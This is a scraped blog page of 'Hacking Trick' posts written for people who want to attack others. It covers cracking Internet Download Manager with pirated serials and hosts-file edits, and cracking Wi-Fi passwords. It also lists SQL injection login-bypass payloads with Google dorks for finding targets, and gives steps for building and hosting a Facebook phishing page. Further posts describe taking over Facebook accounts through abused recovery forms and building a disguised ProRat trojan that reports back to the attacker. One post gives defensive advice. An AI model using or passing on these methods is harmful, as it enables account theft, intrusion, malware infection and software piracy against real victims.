Latest Post
Showing posts sorted by date for query Hacking Trick. Sort by relevance Show all posts
Showing posts sorted by date for query Hacking Trick. Sort by relevance Show all posts

How to Crack Internet Download Manager (IDM) manually(How-tos)


Hello Friends, today i am going to explain how to hack or crack Internet Download Manager (IDM) manually. IDM is the best Internet download manager available on internet but its not free and its cracked or patched versions contains viruses. Using this hack you can register the Internet Download Manager (IDM) for free using you own credentials i.e register on your Name and email ID. I am explaining the manual hacking method because most of my users said that patch and keygen contain viruses.
Now suppose you have updated your IDM (Internet Download Manager) and if you are using cracked or patched version, after updating IDM, it shows an error message that you have registered IDM using fake serial key. And after that IDM exits and hence it doesn't download anything.
This hack also works for trail IDM that means download a trail IDM from there site and register the professional i.e. full version of IDM with your credentials for free using my hack.
Let's start the tutorial, How to hack or crack IDM manually.
Steps Involved:
Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.
 If you don't wanna update your version, Just click on Registration.
Step2: When you click on registration, Now a new dialog appears that is asking for Name, Last Name, Email Address and Serial Key.
Step3: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:
RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M
And click on ok to register.
Step4: Now after you click ok, it will show an error message that you have registered IDM using fake serial key and IDM will exit. Now here the hack starts.
Step5: Now Go to START --}} Then go to RUN  and type the following text and click enter:
notepad %windir%\system32\drivers\etc\hosts
For Windows 7 users, due to security reasons you will not be able to save hosts file.
The trick is below: 
First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see thehosts file.
Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on applyand then click on Ok, now u will be able to edit the hosts file and save changes in it.Step6: Now a notepad file appears something like this as shown below:

Now copy the below lines of code and add to hosts file as shown above:
127.0.0.1    tonec.com
127.0.0.1    www.tonec.com
127.0.0.1    registeridm.com
127.0.0.1    www.registeridm.com
127.0.0.1    secure.registeridm.com
127.0.0.1    internetdownloadmanager.com
127.0.0.1    www.internetdownloadmanager.com
127.0.0.1    secure.internetdownloadmanager.com
127.0.0.1    mirror.internetdownloadmanager.com
127.0.0.1    mirror2.internetdownloadmanager.com
After adding these piece of code, save the notepad file. And exit from there.
Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire. That means it will remain full version for life time and you can update it without any problem.
Here is my proof of Successfully Hacking IDM:


 

Hack Any WIFI Password Network And use Unlimited Free Internet (Hacking Trick)



First you have to know what is Wi-Fi and how dose it work? 
"Wi-Fi" is a type of wireless networking protocol that allows devices to communicate without cords or cables.
1: Wi-fi uses antennas around which wi-fi "hotspots" are created. The hotspots are outlets equipped to receive the radio waves that power wireless networking. Until recently, wi-fi has been confined to more than 10,000 hot-spots in cafes, bars and airport lounges. But various projects are under way to set up city-wide zones, where a series of antennas are installed in the streets, on lampposts or street signs. The hotspots around them together create a much wider area of coverage. Norwich has a mesh network which links each lamppost antenna to the next creating a seamless wi-fi hotspot around the center of the city.
2: The source internet connection is provided by a PC or server to which the antennas are connected either wirelessly or via a cable.
3: Some mobile phones and personal digital assistants (PDA) now have wi-fi chips installed. With mobile phones, this means conventional networks can be bypassed and inexpensive long-distance calls made over the web (using Voice over Internet Protocol, VoIP).
4: Many laptops and handheld computers now come with built-in wi-fi connectivity; it is also possible to add wi-fi to your computer with a special card that plugs into a port on your laptop.
Some organizations provide it for free but maximums provide it for business purpose only. And you have to give a password to access this kind of network.
This software price is $1099. Don't worry, I'm giving you for FREE.

Download This Software from Here  [Mediafire Link]

Note: Please turn off your anti-virus program before you install this software, otherwise this software will not work properly. After completing installing process you can re-run your anti-virus program.

Now follow the Instructions bellow:

1. Install the software and drivers.

2. Click on ‘Rules’ tab and tick on ‘Enable advance rules’ option.
3. Type ‘a’ on Name box and Past this code on formula box “tods=1 and dmac=FF:FF:FF:FF:FF:FF” like picture bellow. Then click ‘add/edit’ button.
4. A window will appear like the picture bellow. Give a tick on ‘a’ .
5. Then go to ‘Settings’ and click ‘Option’
6. Go to ‘Memory Usage’ tab and set everything just like this picture & click ‘Ok’ (Restart may be required).
7.  Check ‘D’ funnel and uncheck another two funnel from the right top of this window.
8. Click ‘Search’ button and find the network that you want to creak.
9. Then drag it on ‘Channel’ tab and click ‘Capture’ button.
10. Now which one is do not capturing anything give it to password protected network and connect it. When it will ask for password, give any as you wish.
11. It will show this massage “Connected with limited connectivity”.
(I have no Wi-Fi connections at this time. that is why, I can’t share some screenshots).
12. Click on main menu again and then click on ‘Packets’ Tab. If everything was all right, you will see some Couple of Packets.
13. Click right button on “ARP REQ”  Packet and then > “Send Packet(s)” > Selected.
14. This menu will appear.
15. Now change all values just like this and click ‘Send’.
16. Go to ‘Rules’ Tab again and uncheck the Rules “a” .
17.  Select first 20000 packets and save it. Make sure you are saving it as “dump cap” file in place of “ncf” file format. (I have no Wi-Fi connections this time, that is why I can’t share some screenshots).
18. Now download a zip folder named “Aircrack-NG” from HERE And extract it.
19. Open ‘bin’ folder and run this file ‘aircrack-ng-GUI.exe’. Then go where you saved the packets, select all and click launch.
20. An ‘IV’ list will came. Select the network that you want to creak.
21. Click ‘Connect’. You will be connected with your desire network like a magic !
22. Enjoy the Unlimited Wi-Fi Internet.
Also you can do with this software :
Done!!!


 

Hack any site(Hacking Trick)

Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries.
What is SQL Injection?
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Step-by-Step tutorial for SQL Injection                          
  
[Step – 1] Find SQL Injection Vulnerable Website
First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.
1) By Google Dork
Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.
There is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
\
2) By Automated Tools
Today many tools are available for found a vulnerable site. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password. “Actually finding admin page is nothing but just a directory of a particular website“.
You can use Admin Finder Script (Perl Script) . I share this script in my previous post. You can get this script and see the tutorial.
[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.
‘or’’=’
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 -- 
[Step – 3] Exploitation Web Applications by SQL Injection
After find admin page of any vulnerable web application. We can exploit that vulnerable web application using client supplied SQL queries. Its enable to execute unauthorized SQL commands.
For example, when a user logs onto a webpage by using user name and password for validation, a SQL query is used there. However an attacker can use SQL\ injection to send specially crafted username and password fields that poison the original SQL queries.
Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a sql vulnerable website
http://demo.testfire.net/bank/login.aspx .
We found an SQL injection point for exploitation. In the image below we can see login page or user authentication form of this web site.
Click Her To See This Page
www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user. 
The query has the following format:
SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'
The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.
The authentication requires the user to enter a valid username and password. We don’t know the valid user name and password. We inject here some SQL queries to bypass login. In username filed we type admin as a username and in password filed we set “or”=”
The query has the following format:
SELECT *
FROM admin
WHERE username = 'admin' AND password = '’or’’=’'

If the query runs successfully we will bypass the login without knowing username and password. In the below Image we can see we bypass login and we use admin panel as an administrator. We manage website contains as we want.
* In My next post we will discuss about Blind SQL Injection.
If you like this post then kindly Share with your friends and groups and
Thank You For Visiting.....


 

Window Hacking(Hacking Trick)





>>Open COMMAND PROMPT while Locked by User.
 
>open notepad
>type www.command.com
> then save as cmd.bat at desktop
>then enter now its open.....enjoy


>>If your computer is slow?
then clean up the ram..

>Open notepad
>type FREEMEM=SPACE(64000000)
>Save it as ram.vbs
now run the script.
Check out !!



>>CracK BIOS Password
>Open the CPU
>Observe the Motherbord
>Remove the Silver Battery(3v)
>Wait 2 minutes and place the Battery
>>Restoring a Lost Desktop-
>Start
>Run
Type a period " . "
Then press Enter



>>If ur PC is hanged then do this.
Press shift+ctrl+esc or ctrl+alt+del
n den click on 'END TASK'
ur PC is runing now


>>create folder without name
>select any folder
>rename it
>press alt & type 0160 or 255
>enter


>>Amazing trick for use
Windows Backup Utility if installed
go to run
type ntbackup
ok
Now use backup


>>Increase the speed of your file sharing
Simple Way to Share Multiple Folders :
Goto Run and Type SHRPUBW.EXE then press Enter
Select the folder you want to share and Set permissions,
your share folder is ready now..... 



>>Turning off the Help on Min, Max, Close Icons
When the mouse goes over the minimize, maximize and close icons on the upper
right hand side of a window.

To disable that display:
1. Start Regedit
2. Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
3. Create a String Value called MinMaxClose
4. Give it a value of 1
5. Reboot


>>FIX CORRUPTED FILE IN WINDOW XP
1.Load XP cd into cd drive

2. go to Run

3. type sfc/scannowok

4. Then copy its lost file frm cd.


 
>>AUTO DELETE TEMPORARY FOLDER.!!
what i prefer is %temp% " without quotes.. at Start -> Run.. this opens ur temp folder n den u cal erase it nearly
First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in
that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.


>>Locking Folders:
  • Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
  • Now open the Notepad and type the following
[code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]
  • Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
  • Open another new notepad text file and type the following
[code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code]
  • Save the text file as key.bat in the same drive.
Steps to lock the folder:
  • To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
  • To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
>>Locking Drives:
We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
  • Start & Run and type Regedit to open Registry editor
  • Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
  • Create a new DWORD value NoViewOnDrive and set its value as
2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
  • To lock more drives, calculate the value of each drive and then set sum of those numbers as value
  • To unlock your drive just delete the key from the registry.
>>To Remove Recyle Bin From Your Desktop
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
>>Disable the Security Center warnings
Follow the given steps to edit the computer registry for disable message:
First click on Start button then type Regedit in Run option.
Here locate the location to:
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Here in right side panel, double click on Anti Virus Disable Notify and set its value 1.
Now close the registry editor and restart your computer after any changes to go into effect.


>>HIDE DRIVES
How to Hide the drives(c:,d:,e:,a:...etc)


To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 \Explorer

2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .

4.Restart the computer.

5.Now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.

>>Show your name in taskbar

Trick to Show Your name after time in taskbar...
Try this trick to add up ur name in place of AM and PM beside time Its simple

Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK
 Done


 

Hack Facebook wiht Phishing(Hacking Trick)



Welcome to "HACKING begins - An approach to introduce people with the truth of HACKING". Today i got many mails related easiest way to Facebook hacking so i decided to post article on FACEBOOK HACKING. 

What is phishing?
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password.
Phishing Procedure:
Step 1 : First of all download Facebook fake login page
Step 2 : Now open login.php and find (CTRL+F) 'http://www.hackingbegins.com' then change it to your to is the 'http://www.facebook.com' if you want.

Step 3 : Create an account in http://www.my3gb.com/
Step 4 : Then upload all the files Index.htm,login.php in my3bg directory or an other. Open your phishing page. Just type some info into the text box and then you will see in your file manager that a file called "Passwords.htm" is created, In which the password is stored.
Hope this was informative, kindly post your views or comments on this article.


Want to hack facebook password.

Just donwload the files given below and upload them to free web hosting sites such as ripway,110mb etc.
List of Some Free  Hosting Websites For Phishing
http://hackingarticls.blogspot.com/2012/04/where-to-host-my-phishing-page-free.html


 

Hack facebook account easily(Hacking Trick)

Hack facebook account easily

In this tutorial no skill is required, we'll just use the password recovery process with 3 fake profiles.

(The fake profiles should be at least three weeks old)
.

For this you need to make 3 fake profiles on Facebook, and the victim that you want to hack should be added to the friend's list mutual friends would be nice. 

Recovery process, which is accessible through Forgot your password? on the Facebook login page.

Then you need to identify your victim's account by using his Facebook E-mail, Facebook name or Facebook name + Facebook friend's name. It would be easier to identify the victim with his or her facebook name. When you got the account, just click on This Is My account.

Once you could identify you're victimss profile, Facebook suggests you to recover the password by the existing email address. You can bypass that by clicking on No longer have access to these?

Then Facebook will ask a secret question(If the victim has one), to bypass that, you'll need to type the wrong answer three times. After that Facebook will try to help you recover the password by the support of 3 friends.

Just select your three fake profiles that your slave added to his friends.(The friends must be registered more than three weeks).

Then you'll get the code on your fake profiles, with those 3 codes you can easily change the password.


 

How To Hack Facebook Accounts Easily (Hacking Trick)


How to Hack Any Facebook Account easily by Reverting/Reseting Password of your Victim – No Keylogging, Phishing Required.


Hack a Facebook account by the method of reverting the password.
This method does not involve any skill or anything just a brain would be enough to get you through this trick ! Well,
you might think that it is impossible but it is actually true that you can hack any facebook account !
So before we start i would like to tell you what ''Reverting'' actually means…

What is Reverting ?

Reverting is the process of resetting a password without the knowledge of the actual user !
So this is basically a low level of hacking but it does the job for you !

How do I hack my friend’s Facebook ?

Make sure your not logged in to your account.
If you are then make sure you sign out and then follow the following methods.


1- Go Here
That is the form that you will be using in order to hack your user.

2- Then in ''Your E-mail Address'' type your E-mail address.

3- Fill the Details.

4- Once you have done that,You will have a question asking ''Email associated with the compromised account.'' – In that just type ''No'' and nothing else other than that !

5- In ''Your contact email address.'' – Type your own email for you to receive the Password Reset Link.

6- In the ''Full Name of the Account.'' – Type the Name of your victim if you know.If you don’t then:

a) Try finding the Name of the victim by just searching his/her e-mail on Facebook.
b) If that doesn’t work then google the E-mail address of your Victim,that might give you some details.
c) If that also doesn’t work then use the following sites to get them

--> GO HERE

--> GO HERE
So if you follow one of the above methods you should be getting the Full Name of your victim.Now lets move on to the next step
7- “Date Of Birth” – In this column you have to enter the Birthday of your Victim.If you know him personally then you should be knowing it.If not you can just social engineer him and somehow make him tell it.Once you get it you have to enter it in that.

8- “URL (web address) of your compromised profile.” – This is just the profile URL of your Victim which can be got easily(Usually of the form: http://www.facebook.com/profile.php?id=99999)

9- Now your all set ! Before you submit the form just make sure you recheck the whole form if you have done the right thing.Once you do so just click on “Submit”

10- Thats it ! You have done it ! Now you just have to wait for Facebook team to look up for your request ! Once they approve it they will send a link to reset your victim’s Password !


 

How hackers hack Facebook Account & How to stop them?(Hacking Trick)

How hackers hack Facebook Account & How to stop them?

Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many hackers (or should I say crackers?) are actively involved in hacking Facebook accounts of unsuspecting users. This article outlines the many strategies that such hackers use to gain access to Facebook accounts of hundreds of users each day and how you can stop them from hacking your account.
hack facebook account


Email Address Hack


I have always been puzzled by Facebook's leniency in this matter. All a hacker needs to do is know your email address and he will be displayed a confirmation showing your name even if he enters the wrong password. How easily a hacker can then hack your Facebook account if he 'guesses' your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly. Until Facebook does so, here are some tricks you can use to protect yourself from this vulnerability.

How to safeguard your Email Address?
Just follow these steps:-
  1. Hide your Email Address from everyone by going to Edit Profile>Contact Information>Clicking on the icon beside your email address> checking 'Only Me'.
  2. Change your primary email address to a one that is only known to you by going to Account Settings>Email> and changing your primary email to the new one (known only to you) and removing your previous email address.
  3. For additional security, when in Account Settings, check 'Secure browsing' and 'Send me an email when a new computer or mobile device logs into this account' and click Save.
    hack facebook
Phishing
Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user's login credentials.

How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various "Facebook widgets" offered by websites and blogs. Instead, use Facebook's homepage to sign in. Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it.
hack facebook password
Keylogging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

How to stop keyloggers?

nstall a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person's flash and pen drives before using them on your computer.


 

Hack facebook account without phishing or keylogger ;-) (Hacking Trick)


How to hack any facebook account easily by Reverting/Reseting pass of your victim NO keyloging pishing required
Here is one more interesting tip on how to hack a Facebook account by the method of reverting the password.This method does not involve any skill or anything just a brain would be enough to get you through this trick ! Well,you might think that it is impossible but it is actually true that you can hack any facebook account ! So before we start i would like to tell you what “Reverting” actually means…
What is Reverting ?
Reverting is the process of resetting a password without the knowledge of the actual user ! So this is basically a low level of hacking but it does the job for you !
For more on reverting go here : What exactly is reverting ?
How do I hack my friend’s Facebook ?
Make sure your not logged in to your account.If you are then make sure you sign out and then follow the following methods
1.Go to this link:
That is the form that you will be using in order to hack your user.
2.Then in “Your E-mail Address” type your E-mail address.
3.Then apply the following options as in the image below.

4.Once you have done that,You will have a question asking “Email associated with the compromised account.” – In that just type “No” and nothing else other than that !
5.In “Your contact email address.” – Type your own email for you to receive the Password Reset Link.
6.In the “Full Name of the Account.” – Type the Name of your victim if you know.If you don’t then:
a.Try finding the Name of the victim by just searching his/her e-mail on Facebook.
b.If that doesn’t work then google the E-mail address of your Victim,that might give you some details.
c.If that also doesn’t work then use the following sites to get them
http://com.lullar.com/
http://www.pipl.com/email/
So if you follow one of the above methods you should be getting the Full Name of your victim.Now lets move on to the next step
7.”Date Of Birth” – In this column you have to enter the Birthday of your Victim.If you know him personally then you should be knowing it.If not you can just social engineer him and somehow make him tell it.Once you get it you have to enter it in that.
8.”URL (web address) of your compromised profile.” – This is just the profile URL of your Victim which can be got easily(Usually of the form: http://www.facebook.com/profile.php?id=99999)
9.Now your all set ! Before you submit the form just make sure you recheck the whole form if you have done the right thing.Once you do so just click on “Submit”
10.Thats it ! You have done it ! Now you just have to wait for Facebook team to look up for your request ! Once they approve it they will send a link to reset your victim’s Password !


 

ProRAT(Hacking Trick)

To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat using a Rat tool you can hack any email account in world facebook, yahoo,gmail,..etc.

1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. antivirus wil detect it as trojan but it is a false positive detection.
2. Open up the program. You should see the following:

3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server. 


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options. 


5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.
6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document. 
7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it. 
8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document. 



9. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like.

10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it. 
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. 
12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it. 


13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. Below I’ll show you a few examples 


14. The image below shows the message I would get on my screen if the hacker chose to message me. 


15. Below is an image of my task bar after the hacker clicks on Hide Start Button. 


16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.


 
 

Copyright © 2011. Tricks Duniya - All Rights Reserved